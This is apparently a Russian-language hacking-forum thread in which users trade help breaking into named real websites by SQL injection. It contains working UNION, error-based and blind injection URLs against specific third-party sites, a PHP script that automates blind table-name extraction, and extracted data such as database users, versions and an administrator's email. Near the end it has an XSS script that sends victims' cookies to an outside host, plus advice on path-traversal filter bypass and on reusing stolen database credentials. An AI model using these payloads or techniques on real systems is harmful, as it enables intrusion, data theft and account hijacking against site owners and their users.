так случилось такая ситуация. По GET запросу подбирал таблицы на опера типа:

commentary.asp?article=(%53elect+top+1+table_name+ from+information_schema.tables+where+table_name+no t+in+('blabla1','blabla2','blabla3',.............. ....'blabla50')
в результате помоему добился на максимальную длину символов на GET для опера. Теперь уже не принимает больше не одного имени таблицы, но нужные таблицы пока не нашлос.
Как можно обходит этого или как увеличить число символов адресной строки для Opera?

в результате помоему добился на максимальную длину символов на GET для опера. Теперь уже не принимает больше не одного имени таблицы, но нужные таблицы пока не нашлос.
Как можно обходит этого или как увеличить число символов адресной строки для Opera?
попробуй отсылать данные каким нить стороним софтом или скриптом, так можно будет обойти ограничение со стороны клиента

пробовал webscarab но оно тоже работает через браузер ((

так случилось такая ситуация. По GET запросу подбирал таблицы на опера типа:
в результате помоему добился на максимальную длину символов на GET для опера. Теперь уже не принимает больше не одного имени таблицы, но нужные таблицы пока не нашлос.
Как можно обходит этого или как увеличить число символов адресной строки для Opera?
----------------------------------------------------
+or+1=(select+top+1+table_name+from+information_sc hema.tables+where+table_name+not+in+(select+top+Х +table_name+from+information_schema.tables))--
----------------------------------------------------
подставляешь вместо X 1, потом 2 и т.д.

http://wow.teletoria.ru/ACP2/index.php?modul=charedit
Не могу найти где Проделать Инъекцию ((
Notice: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') and (`account` = 3181) and (`online` = 0) LIMIT 1' at line 1 in /var/www/html/ACP2/modules/charedit.php on line 6

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/html/ACP2/modules/charedit.php on line 7
Вот код
if (mysql_num_rows($res) == 0) { echo 'Not select character!'; }
else {
$cres = mysql_fetch_array($res);
if (($cres['race'] == 1) or ($cres['race'] == 3) or ($cres['race'] == 4) or ($cres['race'] == 7) or ($cres['race'] == 11))
$char_race = 1; //Alliance
if (($cres['race'] == 2) or ($cres['race'] == 5) or ($cres['race'] == 6) or ($cres['race'] == 8) or ($cres['race'] == 10))
$char_race = 2; //Horde
$money = $cres['money'];
$char_lvl = $cres['level'];

http://acp.svn.beanstalkapp.com/projects/ACP2/modules/charedit.php


if ($_POST['character'] >= 0) {
$c_connect = mysql_connect($c_ip, $c_userdb, $c_pw);
mysql_select_db($c_db, $c_connect);
mysql_query("SET NAMES '$encoding'");
$res = mysql_query("SELECT `name`, `class`, `guid`, `race`, `online`, `gender`, `level`, `money`, `xp` FROM `characters` WHERE (`guid` = ".$_POST['character'].") and (`account` = ".$_SESSION['user_id'].") and (`online` = 0) LIMIT 1") or trigger_error(mysql_error());


Вот здесь $_POST['character']

character=12589)+and+1=(select+*+from(select+*+fro m(select+name_const((version()),14)d)+as+t+join+(s elect+name_const((version()),14)e)b)a)--+

Notice: Duplicate column name '5.0.51a-24-log' in /var/www/html/ACP2/modules/charedit.php on line 6

тынц (http://paradigm.ru/2007/12/19/url-max-length/)

----------------------------------------------------
+or+1=(select+top+1+table_name+from+information_sc hema.tables+where+table_name+not+in+(select+top+Х +table_name+from+information_schema.tables))--
----------------------------------------------------
подставляешь вместо X 1, потом 2 и т.д.

спс большое очень помогло.
при запросе
(%53elect+top+1+Post_count+from+Total)--

всегда ответ одинаковый
ADODB.Field error '800a0bcd'

Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
где может быть ошибка

YuNi|[c
Просто видимо там ничего нету.
Я вот тоже решил первый раз выложить свой вопрос по иньекции.
h_ttp://www.dr service.ru/'
Никак немогу подобрать правильный запрос.
ну или тут
h_ttp://www.dr service.ru/service-centers/nn/NNovgorod/drservice52'/

это что за ужас? так низя
я прсмотрел сайт по-моему там врядли гдето можно внедрить инъекцию. может кто поопытнее что-то найдет
в гугле набери: inurl:index.php?id=1 и подставляй в каждой ссылке кавычку для тренировки

это что за ужас? так низя
я прсмотрел сайт по-моему там врядли гдето можно внедрить инъекцию. может кто поопытнее что-то найдет
в гугле набери: inurl:index.php?id=1 и подставляй в каждой ссылке кавычку для тренировки
Ну если не знаешь, то зачем писать?
Для тренировки я использую методы по интересней :) А вообще то у меня уже свалка доступа к сайтам с посещаемостью не 1к уников в сутки))
Просто вопросы я чаще всего решаю сам, чем пишу на форуме, а крутить простые скули типа как ты говоришь inurl:index.php?id=1, не очень интересно.
зы. Для меня интерес в выведении допустим того же database(), а не сидеть перебирать таблички и смотреть что в них. Перебирать таблички уже с построенного запроса, это вообще практически ничему не учит. Так что, вот так вот :)

Вот же допустим выводиться..
http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1+1='2/

Почему же не выводиться допустим когда вставляем version или другую подобную функцию.
http://www.dr service.ru/service-centers/nn/NNovgorod/drservice52/'and+substr ing(version(),1,1)='5/

Видимо потому что 6 утра и нужно спать)) Бо что-то уже совсем ничего не выводиться )))

Вот же допустим выводиться..
http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1=1='2/


да не хрена там не выводится и не будет т.к это бред то что ты пишешь.
читай http://forum.antichat.ru/thread19844.html

v1d0qz
http://www.drservice.ru/service-centers/nn/NNovgorod/drservice52/'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)--'

Вот немогу понять почему вот так выводиться
http://www.скрыто_по_просьбе_автора. ru/clients/home/business'and+1='1/
а вот так не.
http://www.скрыто_по_просьбе_автора. ru/clients/home/business'and+(SELECT+id+from+catalogue_fin+where+i d=1+LIMIT+1)='1/
Да и вообще как можно раскрутить в данной ситуации, а то уже все перепробывал..
скрипт странно реагирует на точку '.', в связи с чем с ходу не удалось составить запрос в другую базу, зато по ошибке:
in /usr/home/hosting/public_html/webadmin/inc/pvp.php on line 55
находим админку <скрыто>/webadmin/login.php, которая также страдает фрагментированной sqli, но и её не получилось раскрутить в связи с тем что пароль передается в виде md5, зато по выводимомой ошибке можно составить запрос в 1 sqli:
SELECT id, AdminLogin, AdminOpnWin,lock_user,lock_time FROM settings WHERE AdminLogin like binary '\' and AdminPassword='d41d8cd98f00b204e9800998ecf8427e'"
http://www.скрыто_по_просьбе_автора. ru/clients'*ExtractValue(1,concat(1,(select(concat(Ad minLogin,AdminPassword))from(settings)where(id=1)) ))*'1/

https://forum.antichat.ru/threadnav119047-1-10.html

Начиная с последнего поста.

https://forum.antichat.ru/threadnav119047-1-10.html

Начиная с последнего поста.

сорри но там нету решение как в\обойти если не выводится инфо с колонок
пример:
(%53elect+top+1+Post_count+from+Total)--

всегда ответ одинаковый
ADODB.Field error '800a0bcd'

Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

YuNi|[c, там в целом речь о MySQL.

jokester
Так и знал что там можно всё через дупликат красиво оформить.


Вот же допустим выводиться..
http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1=1='2/
да не хрена там не выводится и не будет т.к это бред то что ты пишешь.
читай http://forum.antichat.ru/thread19844.html

Ой сорри, было очень поздно, на втыке написал)
там должно было быть
http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1='2/
Вы главное не нервничайте, всё будет хорошо ;)

Не могу раскрутить скуль

https://hiphop-dojo.com/order/cart.php?id=939'

https://hiphop-dojo.com/order/cart.php?id=939'+and+1=(select+*+from(select+*+fro m(select+name_const((select+table_name+from+inform ation_schema.tables+limit+0,1),14)d)+as+t+join+(se lect+name_const((select+table_name+from+informatio n_schema.tables+limit+0,1),14)e)b)a)--+

Не могу раскрутить скуль

https://hiphop-dojo.com/order/cart.php?id=939'
https://hiphop-dojo.com/order/cart.php?id=-939'+union+select+1,2,3,version(),5,6,7,8,9,10+--+

Есть такой сервер: Apache/2.2.2 (ASPLinux) PHP/5.1.2
Не буду вдаваться в заумные слова. Есть ли хорошие дыры в этой вещи? Нормальный сплойтов не нашел(

ты еще в openssh дыры поищи...

Не я серьезно. Нужно позарез. Нашел порт, где "возможно" удаленно выполнение команд ssh, и на подбор пароля к ssh2.
PS "Возможно" в кавычках не зря((

а что значит "Нашел порт, где "возможно" удаленно выполнение команд ssh"
это как?

по всей видимости нашел там "возможности" какой нибудь сканер...

Да, сканер. Скажите беспонтово лезть на этот сервак? Это локальный сервер, не сайт.

просканируй сервак nmap-ом и ищи в гугле какой нить remote exploit!

просканируй сервак nmap-ом и ищи в гугле какой нить remote exploit!
nmap вообще не находит ни одного порта. Захлебывается на старте. Я уже писал выше, этот сервер не пингуется. На запрос по локальному IP - в браузере чистая страница с чистым исходником. Пробую через веб на IP через ssh порт - показывает версию ssh и все. Вход на ssh через putty закрыт. Ни логина ни пароля мне неизвестно.
Я с ним скоро с ума сойду. Дни и ночи напролет, и на одном месте. Знания, походу, не позволяют(((

поиграйся с флагами nmap! а как это через веб на ssh?

Qwazar Спасиба огромное... Вот почитал пост тут (http://qwazar.ru/?p=7#comment-8378) . Прикольно под все ветки ну ты мозг :). Мне тока одно интересно. Чтоб такая ошибка в браузере вывелась, то должен быть вывод ошибок СУБД а обычно кодера это делают когда отлаживают приложение а потом убирают, хоть и вывод ошибок не подавлен или подавлен(в хтаксесс, в пхп ини, в конф апача, в скрипте во время выполнения это роль не имеет)...
В смысле должно быть после mysql_query, допустим или mysql_fetch_assoc или других подобных функций
что то такого типо or die(mysql_error())
Если после ,например, mysql_fetch_assoc то и пути могут появиться!!!
Тоесть метод работает не у всех блиндах , тоже самое касаеться и ExtractValue и select 1 union select 2 и тому подобных, и определения колонок если не null...
Условия:
1) сообщения от СУБД для всех етих методов (которые обычно убирают после отладки)
Я прав???
Не полностью.На то она и блин,что вывода нет.Чаще всего и вывода ошибок нет,просто белый экран например,но это для нас тоже ошибка! С помощью if() мы чтото сравниваем,и если есть данные - тру,булеый экран - фалсе.

я это знаю я за методы кавазара , дмитрия евтеева там должен быть. Ну так то понятно если нет принтабельных полей то можно логикой работатать все же блинд есть... Ну да, там должно быть что нибудь типа or die(mysql_error())

character=12589)+and+1=(select+*+from(select+*+fro m(select+name_const((version()),14)d)+as+t+join+(s elect+name_const((version()),14)e)b)a)--+
Не совсем понял как работает эта inj (

Встретился с такой проблеммой.
Прочитал конфиг одного сайта, есть логин и пасс от БД, сама БД находится на локалхосте, однако порт 3306 у этого сайта публично открыт, пытаюсь туда законнектиться и облом.
В чём может быть дело? Если порт открыт из веба, то и данные он на него по идее должен из веба принять...

зависит от настроек удаленного доступа

Значит, юзера user@% в БД не существует

Встретился с такой проблеммой.
Прочитал конфиг одного сайта, есть логин и пасс от БД, сама БД находится на локалхосте, однако порт 3306 у этого сайта публично открыт, пытаюсь туда законнектиться и облом.
В чём может быть дело? Если порт открыт из веба, то и данные он на него по идее должен из веба принять...
то что порт открыт - не значит, что тебе туда можно

http://webantenne.com/radio_player_1.php?id=999'

Ошибка вылазит, но раскрутить не могу Оо

http://webantenne.com/radio_player_1.php?id=-999+or+1=1+and+substring(version(),1,1)=3

----------------------------------
Blind MYsql system information:
----------------------------------
database(): db100436_1
version(): 3.23.58-log
user(): db100436_1@localhost

POST-method granted

А вот значит ещё какая вещь у меня появляется.
Нахожу SQL иньекцию, и всё как по плану, подбираю нужное количество колонок и … приехали. Как только подобрал правильное кол-во столбцов, так сразу-же выскакивает ошибка:
Unknown table 'codes' in field list
Вот SQL с примером:
http://catalogue.montevideo.nl/code.php?id=-1+union+select+1,2,3--
Количество столбцов точно 3, но ругается на неправильную таблицу и т.д… Эта ошибка встречается мне очень часто, собственно что тут можно сделать, почему так бывает, и реально ли вывести инфу из неё?

1)К примеру у вас 100 сайтов с .php?id=10
Сколько из них вы взломаете? Не получается у меня нифига =(

2)Как вы обнарижваете sql inj ? script.php?id=1+and+1=1
так ?

1)К примеру у вас 100 сайтов с .php?id=10
Сколько из них вы взломаете? Не получается у меня нифига =(

2)Как вы обнарижваете sql inj ? script.php?id=1+and+1=1
так ?
Ох я ебал.Как в болталке тролить так мы в первое рыло,а как статьи почитать религия не позволяет?
Для каждого случая,отдельная диагностика,где то кавычка,где-то скобка.И нельзя вывести точную статистику сколько сайтов мы взломаем из 100, "благоприятные обстоятельства" нужны :D

А вот значит ещё какая вещь у меня появляется.
Нахожу SQL иньекцию, и всё как по плану, подбираю нужное количество колонок и … приехали. Как только подобрал правильное кол-во столбцов, так сразу-же выскакивает ошибка:
Unknown table 'codes' in field list
Вот SQL с примером:
http://catalogue.montevideo.nl/code.php?id=-1+union+select+1,2,3--
Количество столбцов точно 3, но ругается на неправильную таблицу и т.д… Эта ошибка встречается мне очень часто, собственно что тут можно сделать, почему так бывает, и реально ли вывести инфу из неё?
http://catalogue.montevideo.nl/code.php?id=-1+and+1=(select+*+from(select+*+from(se lect+name_const((version()),1)a)+as+a+join+(select +name_const((version()),1)c)d)s)--+

http://catalogue.montevideo.nl/code.php?id=-1+union+select+1,2,3--
Количество столбцов точно 3, но ругается на неправильную таблицу и т.д… Эта ошибка встречается мне очень часто, собственно что тут можно сделать, почему так бывает, и реально ли вывести инфу из неё?

Не точно 3. Там явно видно, что переменная подставляется в несколько запросов с различным количеством колумнов.

http://catalogue.montevideo.nl/code.php?id=-1+order+by+1,2,3--+


SELECT DISTINCT art.art_ID FROM art INNER JOIN art2code code_id ON art.art_ID = code_id.art_ID INNER JOIN art2code a2c ON art.art_ID = a2c.art_ID INNER JOIN art2code code_publish ON art.art_ID = code_publish.art_ID INNER JOIN codes ON code_publish.code_ID = codes.code_ID WHERE code_id.code_ID = -1 order by 1,2,3-- AND codes.code_GUID = 'MVTBA_pub_web' AND (((a2c.code_ID LIKE 1405 OR a2c.code_ID LIKE 1407 OR a2c.code_ID LIKE 10096 ) ) OR (a2c.code_ID LIKE 1404 ) OR (a2c.code_ID LIKE 1402 ) )
Unknown column '2' in 'order clause'


http://catalogue.montevideo.nl/code.php?id=-1+order+by+1,2,3,4,5,6--+


get_code_info: SELECT codes.text AS code_name, codes.description AS code_description, codes_parent.text AS group_name FROM codes INNER JOIN codes codes_parent ON codes.parent_ID = codes_parent.code_ID WHERE codes.code_ID = -1 order by 1,2,3,4,5,6-- ;
Unknown column '4' in 'order clause'


Инфу можно тащить например так

http://catalogue.montevideo.nl/code.php?id=1+union+select+1,count(*),concat((sele ct+user+from+watsnext.cata_users+limit+1,1),0x3a,f loor(rand(0)*2))+x+from+information_schema.tables+ group+by+x--+


Duplicate entry 'nimk@nimk.nl:1' for key 1


http://catalogue.montevideo.nl/code.php?id=-1+and+1=(select+*+from(select+*+from(se lect+name_const((version()),1)a)+as+a+join+(select +name_const((version()),1)c)d)s)--+

На что-либо кроме version() будет возвращаться ошибка Incorrect arguments to NAME_CONST. С чем это связано я лично не знаю.

На что-либо кроме version() будет возвращаться ошибка Incorrect arguments to NAME_CONST. С чем это связано я лично не знаю.
Я полагаю это косяк функции name_const в этой версии мускуля, т.е. передаваемое как аргумент функции не является постоянным значением (т.е. константой). Вот затестил, если указывать допустим concat(1,0x3a,1), то ошибка, а если просто 1, то ошибка нету. В версии 5.0.32 получилось сделать select table_name в schema, а в 5.0.67 ошибка.

Сори за поднятие этой темы ,обясните кто нить в деталях о скуле с использованием ExtractValue и name_const и -1 UNION SELECT * FROM (SELECT * FROM users JOIN users b)a
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id))a

Собственно есть удаленнка mysql с рут доступом + могу читать все файлы. Какие варианты есть узнать где лежит сайт?
Смотреть таблы с конфигами, возможно будет адрес сайта.
Ох я ебал.Как в болталке тролить так мы в первое рыло,а как статьи почитать религия не позволяет?
Для каждого случая,отдельная диагностика,где то кавычка,где-то скобка.И нельзя вывести точную статистику сколько сайтов мы взломаем из 100, "благоприятные обстоятельства" нужны :D
Особые условия.

Сори за поднятие этой темы ,обясните кто нить в деталях о скуле с использованием ExtractValue и name_const и -1 UNION SELECT * FROM (SELECT * FROM users JOIN users b)a
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id))a

Запрос JOIN объединяет 2 таблички и колонки этих двух табличек. Т.е. допустим если у нас есть 2 таблички и которых есть колонки id, то у нас выводиться "дубликат error 'и тут допустим название колонки дупликата'"
пример: -1+and+1=(select+*+from+(select+*+from+codes+a+JOIN +codes+b)c)--
Выведет в дупликат эроре название колонки 1. Допустим она называется id, с таблички codes,
чтобы вывести вторую колонку, исключаем первую функией USING.
пример: пример: -1+and+1=(select+*+from+(select+*+from+codes+a+JOIN +codes+b+USING(id))c--
Если же добавить к запросу ещё и name_const, то можно выводить не только колонки, но и данные.
например: -1+and+1=(select+*+from+(select+*+from+(SELECT+NAME _CONST((SELECT
password+FROM+users+LIMIT+1),1)x)+a+JOIN+(SELECT+N AME_CONST((SELECT
passwd+FROM+users+LIMIT+1),1)x)+b+USING(id))c--
На счёт ExtractValue, то это только для версии от 5.1.5 вроде..Т.е. функция EXTRACTVALUE извлекает значения элемента из документа XML, но заместь документа, ты вписуешь подзапрос. Допустим Extractvalue((version()),1)
Про дубликаты, есть отличная статья тут, потому как все детали описывать долговато..
h_ttp://www.xakep.ru/post/50554/
или ещё информация об этом, тут.
h_ttp://bugs.mysql.com/bug.php?id=8652

Если где синтаксическая ошибка, прийду исправлю, а то спешу по делам.

И это ошыбки не синтаксические а во времени выпролнения запроса надо еще было добавить и про пост квазара вспомнить который работает у всех версиях мускула
Что серьёзно?)) Уважаемый, я вообще-то написал о синтаксических ошибках в моём тексте :) Ну да ладно. Видимо кто-то уже набрался не дождавшись нового года))

Воппрос по поводу джумлы - это не бреш случайно. Я забыл пасс в джумле : там была соль какая то 7c17fc4ad64ac1761a316464ccb106d7:ZZRM2g8cW3w0b0o2w rtqkn4H97CPOqYn если заменить на суму от md5 например, я заменил на 111 это 698d51a19d8a121ce581499d7b701668, то работает. Заходит в админку при вводе 111. Код не смотрел, а то хз как то все заумно написано не знаеш что к чему относиться)

Шас написал тестовый скрипт, чтобы потренероваться со скулями на локалхосте, так вот почему чтобы вывести поле из таблицы надо чтобы было минимум три выводимых поля? или я ошибаюсь? подскажите плиз.

Шас написал тестовый скрипт, чтобы потренероваться со скулями на локалхосте, так вот почему чтобы вывести поле из таблицы надо чтобы было минимум три выводимых поля? или я ошибаюсь? подскажите плиз.
Ты ошибаешься.
Может быть и одно...

Блин, простите, работает. просто не павраильно имя таблицы написал...

Нужно вначале назначить 2 значения.
Ну или так.
http://zero10.us/m.php?id=2435+and+1=(select+*+fro m(select+*+from+information_schema.tables+a+JOIN+i nf ormation_schema.tables+b)c)--

Почему то не получаеться! Может у кого нить получиться:


Ошибка: .
у тебя в запросе сразу 2 ошибки: конечный подзапрос возвращает 2 пустых поля, из-за этого в первом подзапросе 1=(select * ... ) используются 2 колонки
квазар составил длинный пример на основе предыдущего способа вывода имен колонок, но его можно записать и покороче:
http://zero10.us/m.php?id=2435+or(1,2)=(select*from(select+name_con st(version(),1),name_const(version(),1))a)
а ещё лучше переходить на другой способ:
http://zero10.us/m.php?id=2435+or(1,2)=(select+count(*),concat(vers ion(),floor(rand(0)*2))from(information_schema.tab les)+group+by+2)

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in /.1/www/www.site.ru/top.phtml on line 24

SQL запрос сделать при такой ошибке можно сделать? В запрос подставлил одинарную кавычку

Больше шанса что это некорректная обработка, чем инжа. Чтобы сказат точно, нужно смотреть связку кода.
С чего ты взял, что это некорректная обработка? Вариантов много, и шансов нет никаких, пока нет самого сайта.

ok
http://www.bestwatch.ru/watches.phtml?idb=168&idl=2618
http://www.luxwatch.ru/watches.phtml?idb=168

скуля есть что в 1 что во 2 варианте и логические операции об этом хорошо говорят

http://www.luxwatch.ru/watches.phtml?idb=-168+union+select+version()

Спасибо, оперативно вы..

http://www.arctic-cooling.com/webshop/index.php?shop_id=11+union+select+1,2,null--
http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_45+and+1=1--
http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_44&mID=26544+group+by+19--

version(): 4.0.27-standard
user(): dbo273434928@localhost
database(): db273434928
Также есть таблица admin (+админка http://www.arctic-cooling.com/admin)

jokester отредактировал мой пост в теме SQL Иньекций,поэтому постю сюда.У меня вопрос / прошения о помощи в этом случае.Кароче в первой ссылке вроде как 3 колонки но у меня ничего не получается вывести,кому не лень поиграйтесь с этой скулей плз.

http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28select%20d b_name%28%29%29--
Имя базы данных : News
http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28select%20s ystem_user%29--
Владелец : web
http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=@@version--
Версия : Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

Теперь таблицы и колонки

http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28SELECT%20T OP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TA BLES%29--
Одна из таблиц: failedemails

А дальше сделать ничего не выходит. Никто не поможет? Может в том,что сделано ошибки есть? :(

http://www.arctic-cooling.com/webshop/index.php?shop_id=11+union+select+1,2,null--
http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_45+and+1=1--
http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_44&mID=26544+group+by+19--

version(): 4.0.27-standard


Плохо. Ищи скулю с 'классическим' выводом через юнион+селект. Я посмотрел по первой ссылке - там параметр подставляется в несколько запросов. Не могу поковырять, жутко лажет нет =(

Jerri,

http://www.un.org/sg/articleFullsearch.asp?TID=1+or+1=(select+top+1+fai ledemailaddress+from+newsadmin.failedemails)--+

Нашел =)

http://www.arctic-cooling.com/catalog/tips_and_tricks.php?tPath=7&aID=-521+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19--+

ElteRUS,спс.:)

Плохо. Ищи скулю с 'классическим' выводом через юнион+селект. Я посмотрел по первой ссылке - там параметр подставляется в несколько запросов. Не могу поковырять, жутко лажет нет =(


А мне вот интересно всетаки,можно ли чтото сделать именно с первой ссылкой там где параметр подставляется в несколько запросов.Просто есть тема на античате https://forum.antichat.ru/showpost.php?p=1047720&postcount=74

Там вот похожий случай,я пытался и так но не получалось.А за то что нашел спасибо :) , теперь надо подобрать колонки к таблице admin, но ниче не выходит.Может они на немецком/швейцарском :confused:

Нашел =)

http://www.arctic-cooling.com/catalog/tips_and_tricks.php?tPath=7&aID=-521+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19--+
Вирус, товарщь!

вопрос! нашел слепую скуль на одном с порталов одного очень популярного ресурса!
Возникают сразу два вопроса:
1. Какая вероятность того что уязвимый ресурс стоит на том же сервере что и популярный портал.. ?
2. Возникла проблема в переборе!

Юзаю такой запрос:
+and+(select+lower(substring(user(),1,1))+from+inf ormation_schema.tables+limit+0,1)='a'Написа� � скрипт аналогов которому море,

<form method="post">
<input type="type" name="url" value="http://.html?h=15" size="150">
limit <input type="type" name="ntab" value="17" size="1">,1
<input type="submit" name="start" value="Start" style="cursor:pointer">
</form>

<?
$brutelist ="qwertyuiopasdfghjklzxcvbnm1234567890_";
//$brutelist ="qwertyuiopasdfghjklzxcvbnm1234567890_+!@#\$%^&*\ '\"()";
$word = '<div class="clear mb25">'; //
$url=$_POST['url']; //
$ntab=$_POST['ntab'];

if($_POST['start']){
for($i=1;$i<=10;$i++){ // Позиція символа перебираємої таблиці
for($j=0;$j<strlen($brutelist);$j++){ // Перебирання символа
$linkout=@file_get_contents($url."+and+(select+lower(substring(table_name,".$i.",1))+from+information_schema.tables+limit+".$ntab.",1)='".$brutelist[$j]."'");
preg_match_all($word,$linkout,$out);
if(!$out[0][0]==""){
//echo "<br>".$i."[".$brutelist[$j]."] http://.html?h=15+and+(select+lower(substring(table_name,".$i.",1))+from+information_schema.tables+limit+17,1)='".$brutelist[$j]."'";
$fp=fopen("_.txt","a+");
fwrite($fp,$brutelist[$j]);
fclose($fp);
}

}
}
}
?>


проблема долго юзать перебирать и все такое.. есть альтернатива.?
читал статью _http://www.xakep.ru/post/49697/default.asp
ошибок нет, ascii не разрешено юзать, ничего не выводит.
Жду похорошо професионального ответа. ;)

1. Какая вероятность того что уязвимый ресурс стоит на том же сервере что и популярный портал.. ?
reserse ip ?

ну да чото забыл)
Кстати проверил mail.ru выдал:
Inbox.ru
Mail.ru
Porsche924.ru
Тоже самое когда *.mail.ru
Для болие точного результату спрошу, тоисть отрицательный?

я в html файле пишу <script>...</script>, а <html><head><title><bodyl><head><title><body> Писать?> Писать?

если

кто хочет может поиграться банк рефератов!!!
класический вариант юнион + селект не проходит и с дупликатами тоже

http://www.bank-referatov.info/info.php?id=106+and+1=1+and+substring(version(),1, 1)=5

@@basedir: /
@@tmpdir: /tmp/
database(): kupich_kur
@@datadir: /var/lib/mysql/
version(): 5.0.87-community
user(): kupich_Kupich@localhost

я с подобным раньше не сталкивался:

http://web.atto.ru/catalog_new/catalog.php?act=tovar&CODE=211259

если подставить кавычку, то эрроры будут и от mssql и от mysql, как это ?
и возможно ли из этого что-то извлечь полезное (имя БД, юзера, версию, а то как ни пробовал, не получается) ?

пути
а mssql и mysql одновременно, это как ? :(

А что здесь странного? Разве то, что об этом нигде не писалось, но все возможно. Все зависит от скрипта, в котором могут быть и все СУБД одновременно.

А что здесь странного? Разве то, что об этом нигде не писалось, но все возможно. Все зависит от скрипта, в котором могут быть и все СУБД одновременно.

скрипт с 2 СУБД поидеи работает и все, ничего тут странного .

только что нашел на atto домене

http://smarthome.atto.ru/index.php?page=news&act=view&id=378+union+select+1,2,concat_ws(0x3a,user(),data base(),version(),@@version_compile_os),4,5--+

atto@localhost:atto_new:4.1.22-log:portbld-freebsd6.2
Спасибо =)

Уважаемые форучане, нужна ваша помощь в данной иньекции..по мне так стоит фильтр на лимит и на скобки.... подсобите пожайлуста..
http://topline.md/products.php?idproduct=-8819/**/UNION/**/SELECT/**/1,2,3,table_name,5,6,7,8,9/**/from/**/information_schema.tables/**/%23&idcat=1

http://topline.md/products.php?idproduct=-8819/**/UNION/**/SELECT/**/1,2,3,table_name,5,6,7,8,9/**/from/**/information_schema.tables/**/limit/**/1,1/**/%23&idcat=1

не понял трабла (хотя со скобками да, заморочка какая-то)

PS: СНГ )

Pashkela извини.. что то я тормознул...большое спасибо

А можно ли вставить подзапрос модификации в инъекцию select?
Привелегий на запись файлов нет, привелегий на чтение файлов нет...
Хотелось бы выполнить insert или update..

База MySQL, 5.0.70

http://mgta.ru/struct/faculty/psychology/030301%27+an d+1='1/
http://mgta.ru/struct/faculty/psychology/030301%27%20union%20select%201%20--%20/ и так далее.

кстати меня єтот вопрос тоже волнует !!!
поидеи можно но я такое не встречал , допустим если много запросов через разделять
какие то дополнительные разширения или ХЗ

Разделение через точку запятой это для MsSQL, mysql из php так не может, да и из остальных помоему тоже. Хотелось бы что нибудь типа on duplicate key, только для selecta. Интересно, нет никакого on error?

а mysqli розширение не??? я не увверен но просто когда то что то читал в книге кажеться библия пользователя пхп мускуль ...
Ну вообще есть такие запросы, но при непосредственной работе с базой.
Насколько я знаю из php такое нельзя выполнить.

почитай о mysqli тут (http://www.php.su/functions/?cat=mysqli) тока его редко используют а используют тогда если много запросов тупят роботу, то переписуют одним используя multi_query.
Да, действительно. Но нам это к сожалению врядли поможет :(

Как поднятся на уровень директории выше, если скрипт обрезает ".."?

Как поднятся на уровень директории выше, если скрипт обрезает ".."?
сомневаюсь в возможности

Как поднятся на уровень директории выше, если скрипт обрезает ".."?


Обрезается только ".." или "." тоже?

Ку алл. Такой вопрос. Есть сайт с хсс, в поле поиска выполняется
<script > alert("XSS") < /script>
Немного помудрив смог выполнить на нем хтмл код
<img src=http://a3.bing.com/reference/assets/orig/128px/Noscriptlogo.png>
т.е. прописав этот код в поиске - на странице отобразилась картинка. я так понимаю, что могу выполнить и любой другой хтмл код
Собственно вопрос: смогу ли я, используя хтмл, залить шел или же только кража куков?
и вообще какие варианты, используя, то что я сейчас знаю пробиться к админке или бд?

Ку алл. Такой вопрос. Есть сайт с хсс, в поле поиска выполняется

Немного помудрив смог выполнить на нем хтмл код

т.е. прописав этот код в поиске - на странице отобразилась картинка. я так понимаю, что могу выполнить и любой другой хтмл код
Собственно вопрос: смогу ли я, используя хтмл, залить шел или же только кража куков?
и вообще какие варианты, используя, то что я сейчас знаю пробиться к админке или бд.

Если зальешь шелл через XSS - выложи видео, лол ок.
*не надо мне тут говорить пров аши особые условия :D
Только куки

*скажу сам про особые условия - если через админку льется шелл, то можно написать червячка, который от лица админа сам зальет шелл. Но это много ипоты.

Не только куки еще код скриптов можно смотреть, кузя писал!!!

дай ссылку плиз на это чудо

<script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script>
вот код. Почему картинку не показывает и в логе сниффера не появляется запись? Подскажите плиз

С ним все нормально, иши ошибки в самой ксс. Малоли что оно там фильтрует =\

я отправляю этот файл(это у меня txt файл) открываю его прямо в maile и он открывает только код.

А чего ты собственно хотел? Это конечно интересно отправлять файл и ждать что он выполнится... Учи матчасть, потом заходи.

если не обрезаеться ".', толку то никакого, выше теущего каталого не поднимаешся поидеи!
Пробелы неззя использовать ежу понятно, тоесть вместе должно быть поидеи ".." чтоб перейти в надкаталог, скорее всего регулярка на любое входнеие точки так зачастую, правильно!
может быть обрезаеться слеш , тоесть "/", то можно заменить на "\" если ось win или "\\" если строка в регулярке в двойных кавычках, может быть в начале идет проверка на прямой слеш в регулярке, а потом точка и т.д тоесть если поставить обратный слеш, то фильтр обойдет в win например, а так хз,
вот в win пример:

cd /.. и cd \.. одинаковый результат в win

